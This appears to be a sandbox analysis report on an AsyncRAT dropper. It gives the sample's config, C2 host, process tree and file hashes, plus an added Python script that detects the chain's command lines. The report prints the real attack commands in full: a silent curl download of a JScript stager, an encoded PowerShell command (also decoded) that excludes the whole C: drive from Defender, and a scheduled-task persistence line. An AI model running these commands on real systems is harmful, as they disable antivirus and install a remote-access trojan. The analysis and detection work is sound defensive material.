Analysis
- max time kernel: 4s
- max time network: 25s
- platform: windows10-2004_x64
- resource: win10v2004-20250314-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29/03/2025, 23:26
- Static task: static1
- Behavioral task: behavioral1
  Sample: evo.gj.exe
  Resource: win7-20240903-en
General
- Target: evo.gj.exe
- Size: 2.8MB
- MD5: dee0ebab182b215c4e1fb1c7da903d8a
- SHA1: 84c3444a053cb709a4dd9b9928b40b4373b78732
- SHA256: 49fcfcbb8cc1c85f2c7ec36eb139df3b70b898689b8e7f58b7c054ca900a9ce4
- SHA512: fa9c0d00dfb679a4d1c324390bcf2f8d562cf779e4f5487cb508f7167842c3453f545db593a218df3633aa36de98578115b9eaff7cd7b59969b1b264f78deb5c
- SSDEEP: 49152:z7YGtlq/IU6iZXNVxrGiPsPAmpoAzjicaCNH2kLLKevfQfGVGNPq0ATmn9/:X9+brGiPoB421fQOVGU05
Malware Config
Extracted
- URL: http://3.27.199.84:3000/RuntimeBrokerSvc.exe
Extracted
- Family: asyncrat
- Version: 0.5.8
- Botnet (group): Default
- C2: 3.27.199.84:9182
- Mutex: gRLpFG01LHh3
- Attributes:
  delay: 3
  install: true
  install_file: RuntimeBrokerSvc.exe
  install_folder: %AppData%
The install settings match what the run shows: a 3-second timeout, a copy of the RAT at C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe, and an on-logon scheduled task named RuntimeBrokerSvc. The payload download URL (port 3000) and the C2 (port 9182) share the host 3.27.199.84, so blocking that single address covers both stages.
Signatures
- Asyncrat family
- Async RAT payload (1 IoC)
  YARA match: behavioral2/files/0x0007000000024188-333.dat matched rule family_asyncrat
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths or processes.
  PID 3468 powershell.exe
  The report records the attempt, not its result. On a live host confirm with Get-MpPreference (ExclusionPath) and by reading HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths, because this chain writes the exclusion in both places (see the process tree below).
- Downloads MZ/PE file
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow 38: discord.com
  flow 39: discord.com
  flow 40: discord.com
- Drops file in System32 directory (1 IoC)
  File created: C:\Windows\System32\a.txt by wscript.exe
  A write to the root of System32 needs an administrative token, so wscript.exe (and the PowerShell and reg.exe children it spawns) already ran elevated in this sandbox. On a standard-user host the System32 write, the HKLM policy write and Add-MpPreference would all fail.
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (1 IoC)
  PID 2084 timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 2700 schtasks.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 3132 evo.gj.exe (2 entries)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
  PID 3768 msedge.exe (5 entries)
- Suspicious use of FindShellTrayWindow (2 IoCs)
  PID 3768 msedge.exe (2 entries)
  This signature, the NtCreateUserProcessBlockNonMicrosoftBinary one and the BIOS registry queries all fire on msedge.exe (PID 3768), the browser the sample launched to open a Discord invite. They are the browser's own start-up behaviour and should not be attributed to the sample.
- Suspicious use of WriteProcessMemory (64 IoCs)
  source PID -> target PID (source process, procid_target), with the number of identical entries:
  3132 -> 628 (evo.gj.exe, 87): 2 entries
  628 -> 3768 (cmd.exe, 88): 2 entries
  3132 -> 4004 (evo.gj.exe, 90): 2 entries
  4004 -> 4112 (cmd.exe, 91): 2 entries
  3768 -> 4652 (msedge.exe, 93): 2 entries
  4112 -> 2892 (cmd.exe, 92): 2 entries
  3768 -> 2688 (msedge.exe, 94): 2 entries
  3768 -> 4884 (msedge.exe, 95): all remaining entries (50 of the 64)
  Every target here is a direct child of its source in the process tree below, which is consistent with the parent writing the child's start-up data at process creation rather than with injection into an unrelated process.
Processes
- C:\Users\Admin\AppData\Local\Temp\evo.gj.exe (PID 3132)
  Command line: "C:\Users\Admin\AppData\Local\Temp\evo.gj.exe"
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 628)
    Command line: C:\Windows\system32\cmd.exe /c start https://discord.gg/7drg5EN8hm
    Signatures: Suspicious use of WriteProcessMemory
    The sample opens a Discord invite in the default browser; everything under this cmd.exe is Edge's own process tree for that page.
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3768)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7drg5EN8hm
      Signatures: Enumerates system info in registry; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
      - msedge.exe, crashpad handler (PID 4652)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2dc,0x7fff4e6ef208,0x7fff4e6ef214,0x7fff4e6ef220
      - msedge.exe, network service (PID 2688)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:3
      - msedge.exe, GPU process (PID 4884)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
      - msedge.exe, storage service (PID 4560)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:8
      - msedge.exe, renderer client 6 (PID 5108)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
      - msedge.exe, renderer client 5 (PID 2692)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
      - msedge.exe, renderer client 7 (PID 4424)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4252,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:1
      - msedge.exe, extension renderer client 8 (PID 1412)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4260,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:2
      - msedge.exe, data decoder service (PID 2500)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:8
      - msedge.exe, data decoder service (PID 1128)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3840,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3916 /prefetch:8
      - msedge.exe, renderer client 11 (PID 4208)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5340,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:1
      - msedge.exe, asset store service (PID 4624)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5728,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:8
      - msedge.exe, entity extraction service (PID 4632)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5720,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5780 /prefetch:8
      - msedge.exe, video capture service (PID 1888)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:8
      - msedge.exe, audio service (PID 4684)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5172,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:8
      - identity_helper.exe, WinRT app id service (PID 388)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:8
      - identity_helper.exe, WinRT app id service (PID 428)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:8
  - C:\Windows\system32\cmd.exe (PID 4004)
    Command line: C:\Windows\system32\cmd.exe /c cmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1" > NUL 2>&1
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 4112)
      Command line: cmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\curl.exe (PID 2892)
        Command line: curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"
        The JScript stager is fetched with the curl.exe that ships with Windows 10, silently (-s) and following redirects (-L), from a Dropbox share, and written to C:\Windows\Temp. The nested cmd /c and the > NUL 2>&1 redirection hide any error output.
  - C:\Windows\system32\cmd.exe (PID 1824)
    Command line: C:\Windows\system32\cmd.exe /c wscript "C:\Windows\Temp\buildtools.js"
    - C:\Windows\system32\wscript.exe (PID 3532)
      Command line: wscript "C:\Windows\Temp\buildtools.js"
      Signatures: Drops file in System32 directory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3792)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnACIAOwAgAHIAZQBnACAAYQBkAGQAIAAnAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABFAHgAYwBsAHUAcwBpAG8AbgBzAFwAUABhAHQAaABzACcAIAAvAHYAIAAnAEMAOgBcACcAIAAvAHQAIABSAEUARwBfAFMAWgAgAC8AZAAgACcAQwA6AFwAJwAgAC8AZgA=
        The -enc argument is base64 of a UTF-16LE string and decodes to:
        powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\'"; reg add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths' /v 'C:\' /t REG_SZ /d 'C:\' /f
        That excludes the whole C: drive from Defender twice: once through the cmdlet (a local preference) and once through the Group Policy key, which Defender merges with the local list and which Remove-MpPreference does not clear. The two child processes below are exactly these two commands.
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3468)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\'"
          Signatures: Command and Scripting Interpreter: PowerShell
        - C:\Windows\system32\reg.exe (PID 3912)
          Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t REG_SZ /d C:\ /f
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4412)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
        This second encoded command is the parent of RBrker.exe, so it is the stage that writes the RAT binary to the user's Temp directory and starts it.
        - C:\Users\Admin\AppData\Local\Temp\RBrker.exe (PID 4688)
          Command line: "C:\Users\Admin\AppData\Local\Temp\RBrker.exe"
          - C:\Windows\SysWOW64\cmd.exe (PID 4044)
            Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"' & exit
            The image is C:\Windows\SysWOW64\cmd.exe although the command line asks for System32: this is WOW64 file-system redirection, which tells you RBrker.exe is a 32-bit process.
            - C:\Windows\SysWOW64\schtasks.exe (PID 2700)
              Command line: schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"'
              Signatures: Scheduled Task/Job: Scheduled Task
          - C:\Windows\SysWOW64\cmd.exe (PID 3812)
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE659.tmp.bat""
            The batch file runs timeout 3 and then starts the installed copy, which is the delay value in the extracted config.
            - C:\Windows\SysWOW64\timeout.exe (PID 2084)
              Command line: timeout 3
              Signatures: Delays execution with timeout.exe
            - C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe (PID 736)
              Command line: "C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (PID 3860)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
  Edge's own elevation service, started independently of the sample's process tree.
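The following is an added example written for this report; it is not the sandbox vendor's signature logic. It takes the command lines recorded in the Signatures and Processes sections above (copied here as constructed sample input) and applies the checks a responder would want from this chain: decoding the -enc PowerShell blob before judging it, flagging Defender exclusions in both the Add-MpPreference form and the HKLM policy-key form written by reg.exe, flagging the on-logon scheduled task with /rl highest that points into %AppData%, the curl download into C:\Windows\Temp, the wscript launch from there, and the timeout delay. The rule names and regexes are this script's own, not the sandbox's.

```python
"""Command-line triage for the chain in the Signatures and Processes
sections above: PowerShell -EncodedCommand decoding, Defender exclusion
tampering (Add-MpPreference and the HKLM policy key written by reg.exe),
schtasks persistence into a user-writable folder, a stager curled into the
Windows Temp directory and run by wscript, and the timeout delay.
Added example for this report, not the sandbox vendor's signature code.
SAMPLE_CMDLINES is copied from the process tree above (constructed input);
the rule names and patterns are this script's own."""
import base64
import binascii
import re

# -EncodedCommand argument exactly as recorded for PID 3792 above.
ENC_BLOB = "cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnACIAOwAgAHIAZQBnACAAYQBkAGQAIAAnAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABFAHgAYwBsAHUAcwBpAG8AbgBzAFwAUABhAHQAaABzACcAIAAvAHYAIAAnAEMAOgBcACcAIAAvAHQAIABSAEUARwBfAFMAWgAgAC8AZAAgACcAQwA6AFwAJwAgAC8AZgA="

# Command lines copied verbatim from the process tree above (constructed sample input).
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c start https://discord.gg/7drg5EN8hm',
    r'curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"',
    r'wscript "C:\Windows\Temp\buildtools.js"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc ' + ENC_BLOB,
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\'"''',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t REG_SZ /d C:\ /f',
    r"""schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"'""",
    r'timeout 3',
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so match the whole prefix family, longest first, followed by a base64 blob.
ENC_RE = re.compile(
    r"(?:^|\s)-(?:encodedcommand|encodedcomman|encodedcomma|encodedcomm|encodedcom|"
    r"encodedco|encodedc|encoded|encode|encod|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# Lower-cased policy path written by reg.exe above. Exclusions stored here are
# merged with the local list and are not removed by Remove-MpPreference.
DEFENDER_POLICY_KEY = r"software\policies\microsoft\windows defender\exclusions"


def decode_encoded_command(cmdline):
    """Return the UTF-16LE string behind -EncodedCommand, or None if the line
    carries no decodable blob."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # some log pipelines strip the base64 padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Return the set of rule names this command line trips. An encoded
    PowerShell payload is decoded and judged on what it actually runs."""
    hits = set()
    low = cmdline.lower()

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("powershell_encoded_command")
        hits |= triage(decoded)

    # Defender tampering in both forms seen above; the drive-root check catches
    # an exclusion that covers everything rather than one folder.
    cmdlet = re.search(r"add-mppreference\b.*-exclusion(?:path|process|extension)", low)
    policy = re.search(r"\breg(?:\.exe)?\"?\s+add\b", low) and DEFENDER_POLICY_KEY in low
    if cmdlet:
        hits.add("defender_exclusion_cmdlet")
    if policy:
        hits.add("defender_exclusion_policy_key")
    if (cmdlet or policy) and re.search(r"(?:-exclusionpath|/v|/d)\s+['\"]?[a-z]:\\(?![\w$])", low):
        hits.add("exclusion_covers_whole_drive")

    # Scheduled-task persistence: logon trigger, highest run level, user-writable target.
    if re.search(r"\bschtasks(?:\.exe)?\"?\s+/create\b", low):
        hits.add("schtasks_create")
        if re.search(r"/sc\s+(?:onlogon|onstart)\b", low):
            hits.add("schtasks_logon_trigger")
        if re.search(r"/rl\s+highest\b", low):
            hits.add("schtasks_highest_runlevel")
        if re.search(r"\\(?:appdata|users\\public|programdata|temp)\\", low):
            hits.add("schtasks_target_user_writable")

    # Stager delivery and execution from a temp directory, plus the decoy URL and delay.
    if re.search(r"\b(?:curl|wget|certutil|bitsadmin)(?:\.exe)?\b", low) and \
            re.search(r"\\(?:windows\\temp|appdata\\local\\temp)\\", low):
        hits.add("download_to_temp_dir")
    if re.search(r"\b[wc]script(?:\.exe)?\b.*\\temp\\[^\s\"]+\.(?:js|jse|vbs|vbe|wsf)\b", low):
        hits.add("script_host_from_temp")
    if re.search(r"\bstart\s+https?://", low):
        hits.add("cmd_start_url")
    if re.search(r"https?://(?:www\.)?(?:dropbox\.com|discord\.gg|discord(?:app)?\.com|cdn\.discordapp\.com)\b", low):
        hits.add("legit_hosting_url")
    if re.match(r"(?:.*\\)?\"?timeout(?:\.exe)?\"?\s+(?:/t\s+)?\d+", low) or "start-sleep" in low:
        hits.add("execution_delay")
    return hits


def triage_report(cmdlines):
    """Map each flagged command line to its sorted findings; clean lines are omitted."""
    report = {}
    for line in cmdlines:
        hits = triage(line)
        if hits:
            report[line] = sorted(hits)
    return report


if __name__ == "__main__":
    for line, findings in triage_report(SAMPLE_CMDLINES).items():
        print(", ".join(findings), "<-", line[:80])
```

Decoding before matching is the part that matters: the raw line for PID 3792 contains neither "Add-MpPreference" nor the policy path, so a rule that only inspects the visible command line misses both, while the two child processes it spawns would each be flagged on their own. The recursion also means a blob that itself launches another -enc PowerShell is unpacked as far as it decodes.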
Network
MITRE ATT&CK Enterprise v15
Downloads
File paths were captured for only one of the entries below.
- Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- Filesize: 6KB
  MD5: 5bfb86760a77a79d3755f852ad29fa91
  SHA1: ae26552a3d4add5f99bbcd835d1b9217ce14c08d
  SHA256: 378d51134523e01ec5533a75b4aed8caed3afeb3eea35dca734d39b345befcb7
  SHA512: 809f1778624ec44ed616a0f59701b6a2992a465568ebff99804716307edabc78fe1171be997fe143eefa960bfddbc1d3b3afbbacf04a005a048913993d0ef10f
- Filesize: 280B
  MD5: 0db1d88802048ff847bfcf47035335bd
  SHA1: bb54059e5b145da464f6521ae67353889ce00771
  SHA256: 416525d2bfeaeab0950175c0eab55ad35e84518ef5299f10565023800788cf9a
  SHA512: 32c5b42febdb38c3a30eb5179b8aa20a5e731b0e83aab16ec73d27b4108bfc89eb6316f71a988388cb5df19267ba823f6d0220fab5584667ba0adb0da1152a30
- Filesize: 280B
  MD5: 8734b4a181214bb62f91cfa36c7e2c98
  SHA1: 9cff323f10778a23d73ac3dcffc038d3bf661b78
  SHA256: e06afe980fa56c8dad3e7c6b8d0d8f1e7eb9a4860ac715e966026fb7631c3ba5
  SHA512: e8648a54da9aa24b6cba1f0377a0ce33979ea097554bb6347f252cad894ad4134e1fe839abc80eb48e2510061d5c6937e80374d32f95afd4cc8567b57694ac36
- Filesize: 69KB
  MD5: 164a788f50529fc93a6077e50675c617
  SHA1: c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
  SHA256: b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
  SHA512: ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
- Filesize: 111B
  MD5: 285252a2f6327d41eab203dc2f402c67
  SHA1: acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
  SHA256: 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
  SHA512: 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
- Filesize: 2B (these hashes are those of the two-byte string "[]", an empty JSON array)
  MD5: d751713988987e9331980363e24189ce
  SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
  SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
  SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
- Filesize: 12KB
  MD5: 9c7f565c1b8b562fea0a24a8afc3c597
  SHA1: 494dabefceb7cd66b1b82932f5df127688a30808
  SHA256: 326130a000eaa5b78e417ad65859f5b39467c6d629ac3f98d29fccb8c265a22d
  SHA512: 817741e8b64dc6ad624d0e4b38a1ee37e1aa97e5b83b56305b583f2644f455f64553647b3850a9158087ce0e728fd528443fa204af3390880e92cfc0d7e53c6a
- Filesize: 10KB
  MD5: 6397662a7f1aceb98736365e763e43d2
  SHA1: 6d79861a8b532367089f4f38c7f0b952b7860727
  SHA256: d5516c36988c940ecab999bfa467c61767fb1480b8823fb12c2a870da303dda4
  SHA512: 6f9a77e2d188367fa155f5e9ccaa41e1ca873d97763e26e278fa8b7f9dd8576d38dcf8a7fa4f614be317c82b8ffc5c78db84a0e7c78f6de75b90912d493fa413
- Filesize: 27KB
  MD5: 85d4bd2c164ac8201556f6ca04a10303
  SHA1: dd713a386987b1f5420c8094dc2c8fc0a5682bfc
  SHA256: 8f0f68d0ab910dd7a78653122e3757164dd643253ef5b3004e2094f84646794e
  SHA512: e1b785614ebd4c7bd54e88c8abfa32c8f385024275b6365525290dcd36a8b2f57864dbb1c4a185088faa35c2e9d3405268275582e4dd02ee73656041bc7a30ef
- Filesize: 12KB
  MD5: 4f3599575385a6de711a0666905df548
  SHA1: 9e3d9a899bc125e5b2440dbdbdb9144f85adfeec
  SHA256: 80ce0fbbb5f58367ca60792d2e77077d28ed4d8982a34bd6dcf4ce82aff10b42
  SHA512: d5036ce94934b2719e97039695404fb17f7fa67554e08381d3f399f43cd7352c738959dae159a71e1ed1736b79f269eff47fee34a757c4f18a9a83dec2070008
- Filesize: 12KB
